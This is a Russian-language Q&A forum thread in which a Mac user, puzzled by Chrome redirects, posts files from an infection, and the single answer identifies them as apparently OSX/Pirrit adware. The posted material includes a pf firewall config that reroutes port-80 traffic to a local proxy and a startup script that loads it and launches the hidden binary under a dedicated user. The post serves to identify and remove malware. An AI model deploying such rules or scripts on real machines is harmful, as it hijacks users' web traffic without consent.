Недавно я начал замечать при просмотре веб-страницы в своем MBP 10.10.5 Yosemite, что Chrome Canary Version 53 открывал новую вкладку или некоторые страницы не открывались ... эта вкладка перенаправляла меня на случайные страницы.

Я активировал брандмауэр и заметил, что вызов процесса псевдогидрофобия пытается открыть входящее соединение

/etc/pseudohydrophobia.conf

    rdr pass inet proto tcp from en0 to any port 80 -> 127.0.0.1 port 9882
    pass out on en0 route-to lo0  inet proto tcp from en0 to any port 80 keep state
    pass out proto tcp all user volutate

/etc/pseudohydrophobia.sh

#!/bin/sh

if [ -a /Library/pseudohydrophobia/Contents/MacOS/pseudohydrophobia ];
then
sleep 10
sudo pfctl -evf /etc/pseudohydrophobia.conf
sudo -u volutate /Library/pseudohydrophobia/Contents/MacOS/pseudohydrophobia
fi
exit 0

Порты:

netstat -an | grep 9882
tcp4       0      0  *.9882                 *.*                    LISTEN  

/etc/pseudohydrophobia.conf

rdr pass inet proto tcp from en0 to any port 80 -> 127.0.0.1 port 9882
pass out on en0 route-to lo0  inet proto tcp from en0 to any port 80 keep state
pass out proto tcp all user volutate

Я удалю все эти сценарии и двоичные файлы, но хочу опубликовать их, так как не нашел ни одной ссылки Google.

1 ответ1

1

Посмотрите на https://objective-see.com/blog/blog_0x0E.html.

Анализ навязчивого кроссплатформенного рекламного ПО; OSX/Pirrit

Это может быть вредоносная программа Pirrit.

Имя пользователя volutate и имена файлов (pseudohydrophobia), без сомнения, генерируются случайным образом, но номер порта 9882 совпадает ...

Всё ещё ищете ответ? Посмотрите другие вопросы с метками .